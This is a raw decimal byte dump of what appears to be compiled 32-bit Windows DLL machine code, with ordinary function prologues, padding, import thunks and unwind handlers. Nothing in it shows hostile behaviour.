112,252,114,8,67,131,192,40,59,217,114,233,59,217,116,91,67,128,61,92,39,2,16,0,117,32,131,61,88,39,2,16,0,117,72,232,187,2,0,0,163,88,39,2,16,133,192,116,58,198,5,92,39,2,16,1,235,5,161,88,39,2,16,104,40,5,2,16,80,255,21,140,51,2,16,51,246,59,198,116,26,141,85,240,82,139,85,24,86,86,141,77,216,81,86,86,86,82,255,208,131,196,32,133,192,117,9,95,91,51,192,94,139,229,93,195,139,77,240,139,1,139,16,137,117,228,255,210,61,181,165,49,1,15,133,140,1,0,0,139,77,240,139,1,139,64,28,141,85,232,82,104,36,5,2,16,86,255,208,133,192,15,132,112,1,0,0,139,77,232,139,17,139,82,32,86,86,86,141,69,244,80,87,83,255,210,133,192,15,132,75,1,0,0,139,77,244,137,117,252,139,1,139,64,104,141,85,252,82,255,208,132,192,15,132,40,1,0,0,139,77,252,59,206,15,132,29,1,0,0,139,17,139,66,8,255,208,133,192,15,132,245,0,0,0,139,77,252,139,17,139,82,12,106,0,141,69,248,80,141,69,224,80,141,69,8,80,141,69,236,80,106,0,255,210,132,192,15,132,223,0,0,0,15,183,69,8,59,195,117,14,139,69,236,59,199,119,7,3,69,224,59,248,114,19,139,77,252,139,17,139,66,8,255,208,133,192,117,182,233,166,0,0,0,139,69,248,133,192,15,132,171,0,0,0,61,255,255,255,31,15,131,160,0,0,0,141,12,197,0,0,0,0,81,106,0,255,21,192,51,2,16,80,255,21,188,51,2,16,139,240,133,246,15,132,127,0,0,0,139,77,252,139,17,139,82,12,86,141,69,248,80,106,0,106,0,106,0,141,69,220,80,255,210,132,192,116,82,43,125,236,59,62,114,75,139,77,248,184,1,0,0,0,59,200,118,10,59,60,198,114,5,64,59,193,114,246,139,68,198,252,139,77,20,106,0,37,255,255,255,0,137,1,139,77,244,139,17,139,82,112,106,0,106,0,141,69,16,80,139,69,12,80,139,69,220,80,255,210,132,192,116,7,199,69,228,1,0,0,0,86,106,0,255,21,192,51,2,16,80,255,21,184,51,2,16,139,77,252,139,1,139,16,255,210,139,77,244,139,1,139,80,64,255,210,139,77,232,139,1,139,80,56,255,210,139,77,240,139,1,139,80,40,255,210,139,69,228,95,91,94,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,20,4,0,0,161,12,34,2,16,51,197,137,69,252,128,61,93,39,2,16,0,116,16,51,192,139,77,252,51,205,232,84,112,255,255,139,229,93,195,198,5,93,39,2,16,1,232,246,0,0,0,133,192,15,133,160,0,0,0,86,87,104,252,4,2,16,255,21,204,51,2,16,139,61,144,51,2,16,139,53,196,51,2,16,133,192,116,63,104,4,1,0,0,141,141,244,253,255,255,81,80,255,214,133,192,116,44,104,4,1,0,0,141,149,236,251,255,255,82,141,133,244,253,255,255,80,232,214,2,0,0,131,196,12,133,192,116,13,141,141,236,251,255,255,81,255,215,133,192,117,66,104,4,1,0,0,141,149,244,253,255,255,82,106,0,255,214,133,192,116,44,104,4,1,0,0,141,133,236,251,255,255,80,141,141,244,253,255,255,81,232,150,2,0,0,131,196,12,133,192,116,13,141,149,236,251,255,255,82,255,215,133,192,117,2,51,192,95,94,139,77,252,51,205,232,146,111,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,28,2,0,0,161,12,34,2,16,51,197,137,69,252,86,104,20,6,2,16,255,21,144,51,2,16,139,240,133,246,117,15,94,139,77,252,51,205,232,28,111,255,255,139,229,93,195,87,139,61,140,51,2,16,104,4,6,2,16,86,255,215,137,133,232,253,255,255,133,192,117,16,95,94,139,77,252,51,205,232,243,110,255,255,139,229,93,195,83,104,240,5,2,16,86,255,215,139,216,133,219,116,52,104,224,5,2,16,86,255,215,139,248,133,255,116,38,141,133,236,253,255,255,80,106,1,106,0,104,112,5,2,16,104,2,0,0,128,255,149,232,253,255,255,133,192,116,26,86,255,21,208,51,2,16,91,95,51,192,94,139,77,252,51,205,232,157,110,255,255,139,229,93,195,141,141,240,253,255,255,81,139,141,236,253,255,255,141,149,244,253,255,255,82,141,133,228,253,255,255,80,106,0,104,60,5,2,16,81,199,133,240,253,255,255,8,2,0,0,255,211,139,149,236,253,255,255,82,139,216,255,215,86,255,21,208,51,2,16,133,219,117,168,131,189,228,253,255,255,1,117,159,139,133,240,253,255,255,168,1,117,149,209,232,131,248,2,114,142,72,102,57,156,69,244,253,255,255,117,131,102,131,188,69,242,253,255,255,92,116,14,185,92,0,0,0,102,137,140,69,244,253,255,255,64,131,202,255,43,208,131,250,14,15,130,92,255,255,255,141,72,13,129,249,4,1,0,0,15,135,77,255,255,255,139,21,224,4,2,16,139,13,228,4,2,16,141,132,69,244,253,255,255,137,16,139,21,232,4,2,16,137,72,4,139,13,236,4,2,16,137,80,8,139,21,240,4,2,16,137,72,12,139,13,244,4,2,16,137,80,16,102,139,21,248,4,2,16,137,72,20,102,137,80,24,141,133,244,253,255,255,80,255,21,144,51,2,16,139,77,252,91,95,51,205,94,232,152,109,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,12,6,0,0,161,12,34,2,16,51,197,137,69,252,139,69,8,86,139,117,12,104,0,1,0,0,141,141,244,253,255,255,81,104,0,1,0,0,141,149,244,251,255,255,82,104,0,1,0,0,141,141,244,249,255,255,81,106,3,141,85,244,82,80,232,74,109,255,255,131,196,36,133,192,116,17,51,192,94,139,77,252,51,205,232,190,108,255,255,139,229,93,195,104,64,6,2,16,141,133,244,251,255,255,106,9,80,232,247,113,255,255,131,196,12,133,192,117,213,104,52,6,2,16,141,141,244,253,255,255,106,4,81,232,221,113,255,255,131,196,12,133,192,117,187,141,149,244,253,255,255,82,141,133,244,251,255,255,80,139,69,16,141,141,244,249,255,255,81,141,85,244,82,80,86,232,155,112,255,255,139,77,252,131,196,24,247,216,27,192,51,205,64,94,232,80,108,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,255,37,152,53,2,16,255,37,156,53,2,16,255,37,160,53,2,16,255,37,164,53,2,16,255,37,168,53,2,16,255,37,172,53,2,16,255,37,176,53,2,16,255,37,180,53,2,16,255,37,212,51,2,16,255,37,104,51,2,16,255,37,108,51,2,16,255,37,112,51,2,16,255,37,116,51,2,16,255,37,120,51,2,16,255,37,124,51,2,16,255,37,128,51,2,16,255,37,132,51,2,16,255,37,136,51,2,16,255,37,140,51,2,16,255,37,144,51,2,16,255,37,148,51,2,16,255,37,152,51,2,16,255,37,156,51,2,16,255,37,160,51,2,16,255,37,164,51,2,16,255,37,168,51,2,16,255,37,172,51,2,16,255,37,176,51,2,16,255,37,180,51,2,16,255,37,184,51,2,16,255,37,188,51,2,16,255,37,192,51,2,16,255,37,196,51,2,16,255,37,200,51,2,16,255,37,204,51,2,16,255,37,208,51,2,16,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,133,32,255,255,255,131,224,1,15,132,28,0,0,0,131,165,32,255,255,255,254,139,77,236,131,193,96,139,244,255,21,188,52,2,16,59,244,233,207,96,255,255,195,139,77,236,131,193,8,139,244,255,21,248,52,2,16,59,244,233,185,96,255,255,139,84,36,8,141,66,12,139,138,24,255,255,255,51,200,232,249,92,255,255,184,88,20,2,16,233,69,97,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,77,236,131,233,88,139,244,255,21,248,52,2,16,59,244,233,101,96,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,165,92,255,255,184,140,20,2,16,233,241,96,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,139,244,139,77,236,255,21,228,52,2,16,59,244,233,40,96,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,104,92,255,255,184,188,20,2,16,233,180,96,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,141,77,144,233,197,95,255,255,141,141,32,254,255,255,233,173,93,255,255,141,141,52,254,255,255,233,162,93,255,255,141,141,72,254,255,255,233,151,93,255,255,139,133,184,254,255,255,131,224,1,15,132,18,0,0,0,131,165,184,254,255,255,254,141,141,104,254,255,255,233,118,93,255,255,195,139,84,36,8,141,66,12,139,138,236,253,255,255,51,200,232,239,91,255,255,139,74,252,51,200,232,229,91,255,255,184,228,20,2,16,233,49,96,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,141,77,180,233,53,95,255,255,141,141,48,254,255,255,233,29,93,255,255,141,141,68,254,255,255,233,18,93,255,255,141,141,88,254,255,255,233,7,93,255,255,141,141,120,254,255,255,233,252,92,255,255,141,141,140,254,255,255,233,241,92,255,255,139,84,36,8,141,66,12,139,138,252,253,255,255,51,200,232,107,91,255,255,139,74,252,51,200,232,97,91,255,255,184,56,21,2,16,233,173,95,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,244,139,77,236,255,21,228,52,2,16,59,244,233,216,94,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,24,91,255,255,184,156,21,2,16,233,100,95,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,141,141,20,255,255,255,233,238,90,255,255,139,84,36,8,141,66,12,139,138,4,255,255,255,51,200,232,223,90,255,255,184,204,21,2,16,233,43,95,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,141,77,168,233,53,94,255,255,141,141,68,254,255,255,233,29,92,255,255,141,141,88,254,255,255,233,18,92,255,255,141,141,108,254,255,255,233,7,92,255,255,139,133,208,254,255,255,131,224,1,15,132,18,0,0,0,131,165,208,254,255,255,254,141,141,140,254,255,255,233,230,91,255,255,195,139,84,36,8,141,66,12,139,138,4,254,255,255,51,200,232,95,90,255,255,139,74,252,51,200,232,85,90,255,255,184,244,21,2,16,233,161,94,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,77,236,233,204,94,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,18,90,255,255,184,80,22,2,16,233,94,94,255,255,204,204,204,204,204,204,204,204,204,204,141,77,184,233,98,92,255,255,139,84,36,8,141,66,12,139,138,156,254,255,255,51,200,232,226,89,255,255,184,180,22,2,16,233,46,94,255,255,204,204,204,204,204,204,204,204,204,204,139,244,141,77,236,255,21,56,52,2,16,59,244,233,104,93,255,255,139,84,36,8,141,66,12,139,138,212,254,255,255,51,200,232,168,89,255,255,184,0,23,2,16,233,244,93,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,244,141,77,224,255,21,56,52,2,16,59,244,233,40,93,255,255,139,84,36,8,141,66,12,139,138,24,255,255,255,51,200,232,104,89,255,255,184,128,23,2,16,233,180,93,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,244,141,77,212,255,21,56,52,2,16,59,244,233,232,92,255,255,139,84,36,8,141,66,12,139,138,12,255,255,255,51,200,232,40,89,255,255,184,176,23,2,16,233,116,93,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,77,236,233,229,91,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,242,88,255,255,184,224,23,2,16,233,62,93,255,255,204,204,204,204,204,204,204,204,204,204,139,77,236,233,181,91,255,255,139,84,36,8,141,66,12,139,138,24,255,255,255,51,200,232,194,88,255,255,184,16,24,2,16,233,14,93,255,255,204,204,204,204,204,204,204,204,204,204,139,77,236,233,133,91,255,255,139,84,36,8,141,66,12,139,138,24,255,255,255,51,200,232,146,88,255,255,184,64,24,2,16,233,222,92,255,255,204,204,204,204,204,204,204,204,204,204,139,244,139,77,236,255,21,88,52,2,16,59,244,233,24,92,255,255,139,84,36,8,141,66,12,139,138,8,255,255,255,51,200,232,88,88,255,255,184,112,24,2,16,233,164,92,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,244,139,77,236,255,21,88,52,2,16,59,244,233,216,91,255,255,139,84,36,8,141,66,12,139,138,24,255,255,255,51,200,232,24,88,255,255,184,160,24,2,16,233,100,92,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,77,236,233,2,91,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,226,87,255,255,184,208,24,2,16,233,46,92,255,255,204,204,204,204,204,204,204,204,204,204,139,77,236,233,210,90,255,255,139,84,36,8,141,66,12,139,138,36,255,255,255,51,200,232,178,87,255,255,184,0,25,2,16,233,254,91,255,255,204,204,204,204,204,204,204,204,204,204,139,84,36,8,141,66,12,139,138,4,255,255,255,51,200,232,138,87,255,255,184,104,25,2,16,233,214,91,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,69,8,80,139,141,32,255,255,255,81,232,46,90,255,255,131,196,8,195,139,84,36,8,141,66,12,139,138,8,255,255,255,51,200,232,70,87,255,255,184,16,26,2,16,233,146,91,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,141,141,72,255,255,255,233,250,87,255,255,139,84,36,8,141,66,12,139,138,112,254,255,255,51,200,232,15,87,255,255,184,64,26,2,16,233,91,91,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,106,57,104,100,252,1,16,139,69,232,80,139,77,236,81,255,21,128,52,2,16,131,196,16,195,139,84,36,8,141,66,12,139,74,236,51,200,232,196,86,255,255,184,112,26,2,16,233,16,91,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,141,77,240,255,37,56,52,2,16,139,84,36,8,141,66,12,139,74,244,51,200,232,132,86,255,255,184,160,26,2,16,233,208,90,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,